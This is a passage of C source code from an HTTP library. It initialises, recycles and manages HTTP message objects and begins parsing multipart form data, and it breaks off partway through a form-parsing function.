int http_msg_init_method (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
if (!msg) return -1;
msg->SetTearDownNotify = http_msg_set_teardown_notify;
msg->SetResponseNotify = http_msg_set_response_notify;
msg->SetResStoreFile = http_msg_set_res_store_file;
msg->SetResRecvAllNotify = http_msg_set_res_recvall_notify;
msg->SetResRecvProcNotify = http_msg_set_res_recvproc_notify;
msg->SetReqSendProcNotify = http_msg_set_req_sendproc_notify;
msg->GetMIME = http_msg_get_mime;
msg->GetMIMEMgmt = http_msg_get_mimemgmt;
msg->GetEPump = GetEPump;
msg->GetHTTPMgmt = GetHTTPMgmt;
msg->GetCBObj = http_msg_cbobj;
msg->GetMgmtObj = http_msg_mgmtobj;
msg->GetMsgObj = http_msg_obj;
msg->GetIODev = GetIODev;
msg->GetFrame = GetFrame;
msg->RecycleFrame = RecycleFrame;
msg->Fetch = http_msg_newmsg;
msg->Init = http_msg_init;
msg->InitReq = http_msg_init_req;
msg->InitRes = http_msg_init_res;
msg->Recycle = http_msg_recycle;
msg->Close = http_msg_close;
msg->CacheType = http_msg_cache_type;
msg->CacheFile = http_msg_cache_file;
msg->GetSrcIP = http_msg_srcip;
msg->GetSrcPort = http_msg_srcport;
msg->GetMsgID = http_msg_id;
msg->GetMethod = GetMethod;
msg->GetMethodInd = GetMethodInd;
msg->SetMethod = http_req_set_reqmeth;
msg->GetURL = GetURL;
msg->SetURL = http_req_set_uri;
msg->GetDocURL = GetDocURL;
msg->SetDocURL = http_req_set_docuri;
msg->GetBaseURL = GetBaseURL;
msg->GetAbsURL = GetAbsURL;
msg->GetRelativeURL = GetRelative;
msg->GetSchemeP = GetSchemeP;
msg->GetScheme = GetScheme;
msg->GetHostP = GetHostP;
msg->GetHost = GetHost;
msg->GetPort = GetPort;
msg->GetPathP = GetPathP;
msg->GetPath = GetReqPath;
msg->GetRootPath = GetRootPath;
msg->GetRealPath = GetRealPath;
msg->GetRealFile = GetRealFile;
msg->GetLocFile = GetLocFile;
msg->GetPathOnly = GetPathOnly;
msg->GetFileOnly = GetFileOnly;
msg->GetFileExt = GetFileExt;
msg->GetQueryP = GetQueryP;
msg->GetQuery = GetQuery;
msg->GetQueryValueP = GetQueryValueP;
msg->GetQueryValue = GetQueryValue;
msg->GetQueryUint = GetQueryUint;
msg->GetQueryInt = GetQueryInt;
msg->GetQueryUlong = GetQueryUlong;
msg->GetQueryLong = GetQueryLong;
msg->GetQueryInt64 = GetQueryInt64;
msg->GetQueryUint64 = GetQueryUint64;
msg->GetQueryKeyExist = GetQueryKeyExist;
msg->GetReqFormJsonValueP = GetReqFormJsonValueP;
msg->GetReqFormJsonValue = GetReqFormJsonValue;
msg->GetReqFormJsonKeyExist = GetReqFormJsonKeyExist;
msg->GetReqContentP = GetReqContentP;
msg->GetReqContent = GetReqContent;
msg->GetReqFormDecodeValue = GetReqFormDecodeValue;
msg->GetReqFormValueP = GetReqFormValueP;
msg->GetReqFormValue = GetReqFormValue;
msg->GetReqFormUint = GetReqFormUint;
msg->GetReqFormInt = GetReqFormInt;
msg->GetReqFormUlong = GetReqFormUlong;
msg->GetReqFormLong = GetReqFormLong;
msg->GetReqFormUint64 = GetReqFormUint64;
msg->GetReqFormKeyExist = GetReqFormKeyExist;
msg->GetReqHdrNum = GetReqHdrNum;
msg->GetReqHdrIndP = GetReqHdrIndP;
msg->GetReqHdrInd = GetReqHdrInd;
msg->GetReqHdrP = GetReqHdrP;
msg->GetReqHdr = GetReqHdr;
msg->GetReqHdrInt = GetReqHdrInt;
msg->GetReqHdrLong = GetReqHdrLong;
msg->GetReqHdrUlong = GetReqHdrUlong;
msg->GetReqHdrInt64 = GetReqHdrInt64;
msg->GetReqHdrUint64 = GetReqHdrUint64;
msg->GetReqContentTypeP = GetReqContentTypeP;
msg->GetReqContentType = GetReqContentType;
msg->GetReqContentLength = GetReqContentLength;
msg->GetReqEtag = GetReqEtag;
msg->GetCookieP = GetCookieP;
msg->GetCookie = GetCookie;
msg->ParseReqMultipartForm = http_form_multipart_parse;
msg->DisplayDirectory = DisplayDirectory;
msg->AddReqHdr = AddReqHdr;
msg->AddReqHdrInt = AddReqHdrInt;
msg->AddReqHdrUint32 = AddReqHdrUint32;
msg->AddReqHdrLong = AddReqHdrLong;
msg->AddReqHdrUlong = AddReqHdrUlong;
msg->AddReqHdrInt64 = AddReqHdrInt64;
msg->AddReqHdrUint64 = AddReqHdrUint64;
msg->AddReqHdrDate = AddReqHdrDate;
msg->DelReqHdr = DelReqHdr ;
msg->SetReqContentType = SetReqContentType;
msg->SetReqContentLength = SetReqContentLength;
msg->SetReqContent = SetReqContent;
msg->SetReqFileContent = SetReqFileContent;
msg->AddReqContent = AddReqContent;
msg->AddReqContentPtr = AddReqContentPtr;
msg->AddReqFile = AddReqFile;
msg->AddReqAppCBContent = AddReqAppCBContent;
/* the API operating the HTTP Response */
msg->GetStatus = GetStatus;
msg->GetResHdrNum = GetResHdrNum;
msg->GetResHdrIndP = GetResHdrIndP;
msg->GetResHdrInd =GetResHdrInd ;
msg->GetResHdrP = GetResHdrP;
msg->GetResHdr = GetResHdr;
msg->GetResHdrInt = GetResHdrInt;
msg->GetResHdrLong = GetResHdrLong;
msg->GetResHdrUlong = GetResHdrUlong;
msg->GetResHdrInt64 = GetResHdrInt64;
msg->GetResHdrUint64 = GetResHdrUint64;
msg->GetResContentTypeP = GetResContentTypeP;
msg->GetResContentType = GetResContentType;
msg->GetResContentTypeID = GetResContentTypeID;
msg->GetResContentLength = GetResContentLength;
msg->GetResContent = GetResContent;
msg->GetResContentP = GetResContentP;
msg->SetStatus = SetStatus;
msg->AddResHdr = AddResHdr;
msg->AddResHdrInt = AddResHdrInt;
msg->AddResHdrUint32 = AddResHdrUint32;
msg->AddResHdrLong = AddResHdrLong;
msg->AddResHdrUlong = AddResHdrUlong;
msg->AddResHdrInt64 = AddResHdrInt64;
msg->AddResHdrUint64 = AddResHdrUint64;
msg->AddResHdrDate = AddResHdrDate;
msg->DelResHdr = DelResHdr;
msg->SetResEtag = SetResEtag;
msg->SetCookie = SetCookie;
msg->SetResContentType = SetResContentType;
msg->SetResContentTypeID = SetResContentTypeID;
msg->SetResContentLength = SetResContentLength;
msg->Check304Resp = Check304Resp;
msg->AddResContent = AddResContent;
msg->AddResStripContent = AddResStripContent;
msg->AddResContentPtr = AddResContentPtr;
msg->AddResFile = AddResFile;
msg->AddResAppCBContent = AddResAppCBContent;
msg->AddResTpl = http_pagetpl_add;
msg->AddResTplFile = http_pagetpl_add_file;
msg->RedirectReply = RedirectReply;
msg->Reply = Reply;
msg->ReplyFeeding = ReplyFeeding;
return 0;
}
int http_msg_init (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
msg->msgtype = 0;
msg->hl = NULL;
msg->phost = NULL;
msg->ploc = NULL;
msg->locinst_times = 0;
msg->matchnum = 0;
memset(msg->matchstr, 0, sizeof(msg->matchstr));
msg->cbobj = NULL;
if (!msg->script_var_tab) {
msg->script_var_tab = ht_only_new(23, var_obj_cmp_name);
} else {
ht_free_member(msg->script_var_tab, var_obj_free);
}
msg->state = HTTP_MSG_NULL;
msg->stamp = time(&msg->createtime);
msg->ssl_link = 0;
http_msg_init_req(msg);
msg->pcon = NULL;
msg->conid = 0;
msg->workerid = 0;
msg->redirected = 0;
/* proxy setting clear */
msg->proxied = 0;
msg->cacheon = 0;
msg->proxymsg = NULL;
msg->proxy = NULL;
msg->proxyport = 0;
if (msg->fwdurl) {
kfree(msg->fwdurl);
msg->fwdurl = NULL;
}
msg->fwdurllen = 0;
/* fastcgi setting clear */
msg->fastcgi = 0;
msg->fcgimsg = NULL;
msg->fcgi_resend = 0;
msg->partial_flag = 0;
if (msg->partial_list == NULL)
msg->partial_list = vstar_new(sizeof(http_partial_t), 2, NULL);
vstar_zero(msg->partial_list);
msg->flag304 = 0;
msg->issued = 0;
http_msg_init_res(msg);
msg->resnotify = NULL;
msg->resnotify_called = 0;
msg->resnotify_para = NULL;
msg->resnotify_cbval = NULL;
msg->res_store_file = NULL;
msg->res_store_offset = 0;
msg->res_recv_procnotify = NULL;
msg->res_recv_procnotify_para = NULL;
msg->res_recv_procnotify_cbval = 0;
msg->req_send_procnotify = NULL;
msg->req_send_procnotify_para = NULL;
msg->req_send_procnotify_cbval = 0;
msg->tear_down_notify = NULL;
msg->tear_down_para = NULL;
memset(&msg->extdata[0], 0, mgmt->msgextsize);
return 0;
}
int http_msg_recycle (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
if (!msg) return -1;
msg->hl = NULL;
msg->phost = NULL;
msg->ploc = NULL;
msg->matchnum = 0;
memset(msg->matchstr, 0, sizeof(msg->matchstr));
msg->cbobj = NULL;
if (msg->script_var_tab) {
ht_free_member(msg->script_var_tab, var_obj_free);
}
if (msg->resnotify && !msg->resnotify_called) {
(*msg->resnotify)(msg, msg->resnotify_para, msg->resnotify_cbval, msg->res_status);
msg->resnotify_called = 1;
}
if (msg->pcon) {
http_con_msg_del(msg->pcon, msg);
msg->pcon = NULL;
}
//mgmt = (HTTPMgmt *)msg->httpmgmt;
mgmt = (HTTPMgmt *)gp_httpmgmt;
if (!mgmt || !mgmt->msg_pool)
return http_msg_free(msg);
msg->state = HTTP_MSG_NULL;
http_req_delallcookie(msg);
http_header_delall(msg, 0);
http_header_delall(msg, 1);
frame_empty(msg->req_header_stream);
frame_empty(msg->req_body_stream);
frame_empty(msg->req_stream);
if (frame_size(msg->req_header_stream) > REUSE_BUF_THRESHOLD / 8) //at most 8k
frame_realloc(msg->req_header_stream, REUSE_BUF_THRESHOLD / 8);
if (frame_size(msg->req_body_stream) > REUSE_BUF_THRESHOLD / 2) //32k
frame_realloc(msg->req_body_stream, REUSE_BUF_THRESHOLD / 2);
if (frame_size(msg->req_stream) > REUSE_BUF_THRESHOLD / 2) //32k
frame_realloc(msg->req_stream, REUSE_BUF_THRESHOLD / 2);
if (msg->req_file_handle) {
native_file_close(msg->req_file_handle);
msg->req_file_handle = NULL;
}
if (msg->req_file_cache && msg->req_file_name) {
unlink(msg->req_file_name);
msg->req_file_cache = 0;
kfree(msg->req_file_name);
msg->req_file_name = NULL;
}
msg->req_multipart = 0;
http_chunk_zero(msg->req_chunk);
chunk_zero(msg->req_body_chunk);
while (arr_num(msg->req_rcvs_list) > 0)
frame_free(arr_pop(msg->req_rcvs_list));
arr_zero(msg->req_rcvs_list);
while (arr_num(msg->req_formlist) > 0)
http_form_free(arr_pop(msg->req_formlist));
if (msg->req_form_kvobj) {
kvpair_clean(msg->req_form_kvobj);
msg->req_form_kvobj = NULL;
}
if (msg->req_form_json) {
json_clean(msg->req_form_json);
msg->req_form_json = NULL;
}
if (msg->req_query_kvobj) {
kvpair_clean(msg->req_query_kvobj);
msg->req_query_kvobj = NULL;
}
vstar_zero(msg->partial_list);
if (msg->fwdurl) {
kfree(msg->fwdurl);
msg->fwdurl = NULL;
}
msg->fwdurllen = 0;
/* clear the response member */
frame_empty(msg->res_header_stream);
frame_empty(msg->res_body_stream);
frame_empty(msg->res_stream);
frame_empty(msg->res_line);
if (frame_size(msg->res_header_stream) > 10240) //REUSE_BUF_THRESHOLD/4) //16k
frame_realloc(msg->res_header_stream, 10240);
if (frame_size(msg->res_body_stream) > REUSE_BUF_THRESHOLD / 2) //32k
frame_realloc(msg->res_body_stream, REUSE_BUF_THRESHOLD / 2);
if (frame_size(msg->res_stream) > REUSE_BUF_THRESHOLD / 2) //32k
frame_realloc(msg->res_stream, REUSE_BUF_THRESHOLD / 2);
http_chunk_zero(msg->res_chunk);
chunk_zero(msg->res_body_chunk);
while (arr_num(msg->res_rcvs_list) > 0)
frame_free(arr_pop(msg->res_rcvs_list));
arr_zero(msg->res_rcvs_list);
if (msg->res_file_handle) {
native_file_close(msg->res_file_handle);
msg->res_file_handle = NULL;
}
if (msg->res_file_name) {
kfree(msg->res_file_name);
msg->res_file_name = NULL;
}
if (msg->res_file_cache == 1) {
//unlink(msg->res_file_name);
}
if (msg->res_cache_info) {
cache_info_close(msg->res_cache_info);
msg->res_cache_info = NULL;
}
msg->res_file_cache = 0;
msg->cache_req_start = 0;
msg->cache_req_off = 0;
msg->cache_req_len = -1;
//msg->msgid = 0;
/* recycle the msg to memory pool */
bpool_recycle(mgmt->msg_pool, msg);
return 0;
}
int http_msg_close (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
if (!msg) return -1;
if (http_msg_mgmt_del(gp_httpmgmt, msg->msgid) != msg)
return -100;
/* write http access log to file */
http_log_write(msg);
http_msg_recycle(msg);
return 0;
}
int http_msg_init_req (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * unit = NULL;
int i, num;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
memset(&msg->srcip, 0, sizeof(msg->srcip));
msg->srcport = 0;
memset(&msg->dstip, 0, sizeof(msg->dstip));
msg->dstport = 0;
msg->reqsent = 0;
msg->redirecttimes = 0;
msg->req_url_type = 0;
memset(msg->req_meth, 0, sizeof(msg->req_meth));
memset(msg->req_ver, 0, sizeof(msg->req_ver));
msg->req_ver_major = 0;
msg->req_ver_minor = 0;
if (!msg->uri)
msg->uri = http_uri_alloc();
else
http_uri_init(msg->uri);
if (!msg->absuri)
msg->absuri = http_uri_alloc();
else
http_uri_init(msg->absuri);
if (!msg->docuri)
msg->docuri = http_uri_alloc();
else
http_uri_init(msg->docuri);
msg->req_scheme = NULL;
msg->req_schemelen = 0;
msg->req_host = NULL;
msg->req_hostlen = 0;
msg->req_port = 0;
msg->req_path = NULL;
msg->req_pathlen = 0;
msg->req_query = NULL;
msg->req_querylen = 0;
msg->req_line = NULL;
msg->req_line_len = 0;
msg->req_content_type = NULL;
msg->req_contype_len = 0;
msg->req_useragent = NULL;
msg->req_useragent_len = 0;
msg->req_cookie = NULL;
msg->req_cookie_len = 0;
/* the location of the end of http request header */
msg->req_body_flag = 0;
msg->req_header_length = 0;
msg->req_body_length = 0;
msg->req_body_iolen = 0;
msg->req_chunk_state = 0;
msg->req_chunk_size = -1;
msg->req_chunk_iolen = 0;
msg->req_conn_keepalive = 0;
/* temperory file for storing request */
msg->req_multipart = 0;
msg->req_file_cache = 0;
msg->req_file_name = NULL;
if (msg->req_file_handle) {
native_file_close(msg->req_file_handle);
msg->req_file_handle = NULL;
}
if (!msg->req_header_table) {
msg->req_header_table = ht_only_new(mgmt->header_num, hunit_cmp_key);
hunit_set_hashfunc(msg->req_header_table);
}
ht_zero(msg->req_header_table);
if (!msg->req_cookie_table) {
msg->req_cookie_table = ht_only_new(mgmt->header_num, hunit_cmp_key);
hunit_set_hashfunc(msg->req_cookie_table);
}
ht_zero(msg->req_cookie_table);
if (!msg->req_header_list)
msg->req_header_list = arr_new(4);
else {
num = arr_num(msg->req_header_list);
for (i = 0; i < num; i++) {
unit = arr_pop(msg->req_header_list);
if (!unit) continue;
bpool_recycle(mgmt->header_unit_pool, unit);
}
}
arr_zero(msg->req_header_list);
if (!msg->req_header_stream) msg->req_header_stream = frame_new(256);
frame_empty(msg->req_header_stream);
if (!msg->req_body_stream) msg->req_body_stream = frame_new(128);
frame_empty(msg->req_body_stream);
if (!msg->req_stream) msg->req_stream = frame_new(256);
frame_empty(msg->req_stream);
if (msg->req_chunk == NULL) {
msg->req_chunk = http_chunk_alloc();
}
http_chunk_zero(msg->req_chunk);
if (msg->req_body_chunk == NULL) {
msg->req_body_chunk = chunk_new(8192);
}
chunk_zero(msg->req_body_chunk);
if (msg->req_rcvs_list == NULL) {
msg->req_rcvs_list = arr_new(2);
}
arr_zero(msg->req_rcvs_list);
if (msg->req_formlist == NULL) {
msg->req_formlist = arr_new(4);
}
while (arr_num(msg->req_formlist) > 0)
http_form_free(arr_pop(msg->req_formlist));
if (msg->req_form_kvobj) {
kvpair_clean(msg->req_form_kvobj);
msg->req_form_kvobj = NULL;
}
if (msg->req_form_json) {
json_clean(msg->req_form_json);
msg->req_form_json = NULL;
}
if (msg->req_query_kvobj) {
kvpair_clean(msg->req_query_kvobj);
msg->req_query_kvobj = NULL;
}
msg->req_stream_sent = 0;
msg->req_stream_recv = 0;
return 0;
}
int http_msg_init_res (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HeaderUnit * unit = NULL;
int i, num;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
msg->res_status = -500;
msg->res_verloc = 0;
msg->res_verlen = 0;
msg->res_statusloc = 0;
msg->res_statuslen = 0;
msg->res_reasonloc = 0;
msg->res_reasonlen = 0;
if (!msg->res_line) msg->res_line = frame_new(32);
frame_empty(msg->res_line);
msg->res_header_length = 0;
msg->res_body_length = 0;
msg->res_body_iolen = 0;
msg->res_body_flag = BC_CONTENT_LENGTH;
msg->res_conn_keepalive = 0;
if (msg->res_file_handle) {
native_file_close(msg->res_file_handle);
msg->res_file_handle = NULL;
}
if (msg->res_file_name) {
kfree(msg->res_file_name);
msg->res_file_name = NULL;
}
if (msg->res_cache_info) {
cache_info_close(msg->res_cache_info);
msg->res_cache_info = NULL;
}
msg->res_file_cache = 0;
msg->cache_req_start = 0;
msg->cache_req_off = 0;
msg->cache_req_len = -1;
if (!msg->res_header_table) {
msg->res_header_table = ht_only_new(mgmt->header_num, hunit_cmp_key);
hunit_set_hashfunc(msg->res_header_table);
}
ht_zero(msg->res_header_table);
if (!msg->res_header_list)
msg->res_header_list = arr_new(4);
else {
num = arr_num(msg->res_header_list);
for (i=0; i<num; i++) {
unit = arr_pop(msg->res_header_list);
if (!unit) continue;
bpool_recycle(mgmt->header_unit_pool, unit);
}
}
arr_zero(msg->res_header_list);
if (!msg->res_header_stream) msg->res_header_stream = frame_new(4096);
frame_empty(msg->res_header_stream);
if (!msg->res_body_stream) msg->res_body_stream = frame_new(8192);
frame_empty(msg->res_body_stream);
if (!msg->res_stream) msg->res_stream = frame_new(8192);
frame_empty(msg->res_stream);
if (msg->res_chunk == NULL) {
msg->res_chunk = http_chunk_alloc();
}
http_chunk_zero(msg->res_chunk);
if (msg->res_body_chunk == NULL) {
msg->res_body_chunk = chunk_new(8192);
}
chunk_zero(msg->res_body_chunk);
msg->res_stream_sent = 0;
msg->res_stream_recv = 0;
if (msg->res_rcvs_list == NULL) {
msg->res_rcvs_list = arr_new(4);
}
arr_zero(msg->res_rcvs_list);
return 0;
}
void * http_msg_cbobj (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return NULL;
return msg->cbobj;
}
void * http_msg_obj (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return NULL;
return &msg->extdata[0];
}
void * http_msg_mgmtobj (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return NULL;
return http_mgmt_obj(msg->httpmgmt);
}
char * http_msg_get_mime (void * vmsg, char * extname, uint32 * mimeid)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return "application/octet-stream";
return http_get_mime(msg->httpmgmt, extname, mimeid);
}
void * http_msg_get_mimemgmt (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
HTTPMgmt * mgmt = NULL;
if (!msg) return NULL;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return NULL;
return mgmt->mimemgmt;
}
void * http_msg_newmsg (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return NULL;
return http_msg_fetch(msg->httpmgmt);
}
char * http_msg_srcip (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return "";
return msg->srcip;
}
int http_msg_srcport (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return 0;
return msg->srcport;
}
ulong http_msg_id (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return 0;
return msg->msgid;
}
int http_msg_set_teardown_notify (void * vmsg, void * func, void * para)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return -1;
msg->tear_down_notify = func;
msg->tear_down_para = para;
return 0;
}
int http_msg_set_response_notify (void * vmsg, void * func, void * para, void * cbval,
char * storefile, int64 offset,
void * procnotify, void * procpara, uint64 proccbval)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return -1;
msg->resnotify = func;
msg->resnotify_called = 0;
msg->resnotify_para = para;
msg->resnotify_cbval = cbval;
msg->res_store_file = storefile;
msg->res_store_offset = offset;
msg->res_recv_procnotify = procnotify;
msg->res_recv_procnotify_para = procpara;
msg->res_recv_procnotify_cbval = proccbval;
return 0;
}
int http_msg_set_res_recvall_notify (void * vmsg, void * func, void * para, void * cbval)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return -1;
msg->resnotify = func;
msg->resnotify_called = 0;
msg->resnotify_para = para;
msg->resnotify_cbval = cbval;
return 0;
}
int http_msg_set_res_store_file (void * vmsg, char * storefile, int64 offset)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return -1;
msg->res_store_file = storefile;
msg->res_store_offset = offset;
return 0;
}
int http_msg_set_res_recvproc_notify (void * vmsg, void * procnotify, void * procpara, uint64 proccbval)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return -1;
msg->res_recv_procnotify = procnotify;
msg->res_recv_procnotify_para = procpara;
msg->res_recv_procnotify_cbval = proccbval;
return 0;
}
int http_msg_set_req_sendproc_notify (void * vmsg, void * procnotify, void * procpara, uint64 proccbval)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return -1;
msg->req_send_procnotify = procnotify;
msg->req_send_procnotify_para = procpara;
msg->req_send_procnotify_cbval = proccbval;
return 0;
}
/* 1 - temporary cache file
2 - application-given file for storing response body
3 - proxy cache file with partial content
4 - proxy cache file will all content */
int http_msg_cache_type (void * vmsg, int respornot)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return 0;
if (respornot) {
return msg->res_file_cache;
} else {
return msg->req_file_cache;
}
return 0;
}
char * http_msg_cache_file (void * vmsg, int respornot)
{
HTTPMsg * msg = (HTTPMsg *) vmsg;
if (!msg) return NULL;
if (respornot) {
if (msg->res_file_cache == 1) return msg->res_file_name;
if (msg->res_file_cache == 2) return msg->res_store_file;
} else {
if (msg->req_file_cache == 1) return msg->req_file_name;
}
return NULL;
}
int http_msg_mgmt_add (void * vmgmt, void * vmsg)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * pmsg = (HTTPMsg *)vmsg;
if (!mgmt) return -1;
if (!pmsg) return -2;
EnterCriticalSection(&mgmt->msgtableCS);
ht_set(mgmt->msg_table, &pmsg->msgid, pmsg);
LeaveCriticalSection(&mgmt->msgtableCS);
return 0;
}
void * http_msg_mgmt_get (void * vmgmt, ulong msgid)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * pmsg = NULL;
if (!mgmt) return NULL;
EnterCriticalSection(&mgmt->msgtableCS);
pmsg = ht_get(mgmt->msg_table, &msgid);
LeaveCriticalSection(&mgmt->msgtableCS);
return pmsg;
}
void * http_msg_mgmt_del (void * vmgmt, ulong msgid)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPMsg * pmsg = NULL;
if (!mgmt) return NULL;
EnterCriticalSection(&mgmt->msgtableCS);
pmsg = ht_delete(mgmt->msg_table, &msgid);
LeaveCriticalSection(&mgmt->msgtableCS);
return pmsg;
}
int http_msg_var_set (void * vmsg, char * name, char * value, int valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
var_obj_t * obj = NULL;
int namelen = 0;
if (!msg) return -1;
if (!name) return -2;
namelen = str_len(name);
if (namelen <= 0) return -3;
if (value && valuelen < 0)
valuelen = strlen(value);
obj = ht_get(msg->script_var_tab, name);
if (!obj) {
obj = var_obj_alloc();
obj->name = str_dup(name, namelen);
obj->namelen = namelen;
ht_set(msg->script_var_tab, name, obj);
} else {
if (obj->value) {
kfree(obj->value);
obj->value = NULL;
}
obj->valuelen = 0;
}
if (value && valuelen >= 0)
obj->value = str_dup(value, valuelen);
obj->valuelen = valuelen;
return 0;
}
int http_msg_var_get (void * vmsg, char * name, char * value, int valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
var_obj_t * obj = NULL;
int len = 0;
if (!msg) return -1;
if (!name) return -2;
len = str_len(name);
if (len <= 0) return -3;
obj = ht_get(msg->script_var_tab, name);
if (!obj) {
return -100;
}
len = obj->valuelen;
if (value && valuelen > 0) {
if (len > valuelen) len = valuelen;
str_secpy(value, valuelen, obj->value, len);
return len;
}
return len;
}
<|start_filename|>src/http_form.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_header.h"
#include "http_cgi.h"
#include "http_form.h"
int multipart_conttype_parse (void * vmsg, char ** pboundary, int * plen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
char * pbgn = NULL;
char * poct = NULL;
char * pend = NULL;
HeaderUnit * punit = NULL;
static char * formtype = "multipart/form-data";
int len = 0;
if (!msg) return -1;
punit = http_header_get(msg, 0, "Content-Type", 12);
if (!punit) return -10;
/* compare the mime type
Content-Type: multipart/form-data; boundary=---------------------------7d706402a6
*/
pbgn = HUValue(punit);
pend = pbgn + punit->valuelen;
pbgn = skipOver(pbgn, pend-pbgn, " \t", 2);
if (!pbgn || pbgn >= pend) return -100;
len = str_len(formtype);
if (pend - pbgn < len) return -101;
if (strncasecmp(pbgn, formtype, len) != 0)
return -200;
/* parse the boundary string, pbgn skips to the begining of key 'boundary' */
pbgn += len;
pbgn = skipOver(pbgn, pend-pbgn, ";, \t", 4);
if (!pbgn || pbgn >= pend) return -201;
poct = skipTo(pbgn, pend-pbgn, "=", 1);
if (!poct || poct >= pend) return -204;
/* pbgn skips to the begining of value of boundary */
pbgn = skipOver(poct + 1, pend - poct - 1, " \t", 2);
if (!pbgn || pbgn >= pend) return -205;
poct = skipTo(pbgn, pend-pbgn, " \t,;\r\n", 6);
if (!poct) return -202;
if (poct <= pbgn) return -203;
len = poct - pbgn;
if (pboundary) *pboundary = pbgn;
if (plen) *plen = len;
return 1;
}
void * http_form_alloc()
{
http_form_t * form = NULL;
form = kzalloc(sizeof(*form));
return form;
}
void http_form_free (void * vform)
{
http_form_t * form = (http_form_t *)vform;
if (!form) return;
if (form->name)
kfree(form->name);
if (form->ctype)
kfree(form->ctype);
if (form->filename)
kfree(form->filename);
if (form->basename)
kfree(form->basename);
kfree(form);
}
void * http_form_node (void * vmsg, char * key)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_form_t * form = NULL;
int i, num;
if (!msg || !key) return NULL;
num = arr_num(msg->req_formlist);
for (i = 0; i < num; i++) {
form = arr_value(msg->req_formlist, i);
if (!form) continue;
if (form->name && strcasecmp(key, form->name) == 0) {
return form;
}
}
return NULL;
}
int http_form_get (void * vmsg, char * key, char ** ctype, uint8 * formtype, char ** fname, int64 * valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_form_t * form = NULL;
int i, num;
if (!msg) return -1;
if (!key) return -2;
num = arr_num(msg->req_formlist);
for (i = 0; i < num; i++) {
form = arr_value(msg->req_formlist, i);
if (!form) continue;
if (form->name && strcasecmp(key, form->name) == 0) {
if (ctype) *ctype = form->ctype;
if (formtype) *formtype = form->formtype;
if (fname) *fname = form->filename;
if (valuelen) *valuelen = form->valuelen;
return 1;
}
}
return -100;
}
int http_form_value (void * vmsg, char * key, char * value, int64 valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_form_t * form = NULL;
int i, num;
if (!msg) return -1;
if (!key) return -2;
num = arr_num(msg->req_formlist);
for (i = 0; i < num; i++) {
form = arr_value(msg->req_formlist, i);
if (!form) continue;
if (form->name && strcasecmp(key, form->name) == 0) {
return chunk_read(form->body_chunk, value, form->valuepos, valuelen, 0);
}
}
return -100;
}
int http_form_valuep (void * vmsg, char * key, int64 pos, char ** pvalue, int64 * valuelen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_form_t * form = NULL;
int i, num;
if (!msg) return -1;
if (!key) return -2;
num = arr_num(msg->req_formlist);
for (i = 0; i < num; i++) {
form = arr_value(msg->req_formlist, i);
if (!form) continue;
if (form->name && strcasecmp(key, form->name) == 0) {
if (pos < 0 || pos >= form->valuelen)
return -16;
return chunk_read_ptr(form->body_chunk, form->valuepos + pos,
form->valuelen - pos, (void **)pvalue, valuelen, 0);
}
}
return -100;
}
int http_form_tofile (void * vmsg, char * key, int filefd)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_form_t * form = NULL;
int i, num;
if (!msg) return -1;
if (!key) return -2;
num = arr_num(msg->req_formlist);
for (i = 0; i < num; i++) {
form = arr_value(msg->req_formlist, i);
if (!form) continue;
if (form->name && strcasecmp(key, form->name) == 0) {
return chunk_readto_file(form->body_chunk, filefd, form->valuepos, form->valuelen, 0);
}
}
return -100;
}
int http_form_data_parse (void * vnode, char * cdisp, int displen)
{
http_form_t * node = (http_form_t *)vnode;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pval = NULL;
char * ptmp = NULL;
int len = 0;
if (!node) return -1;
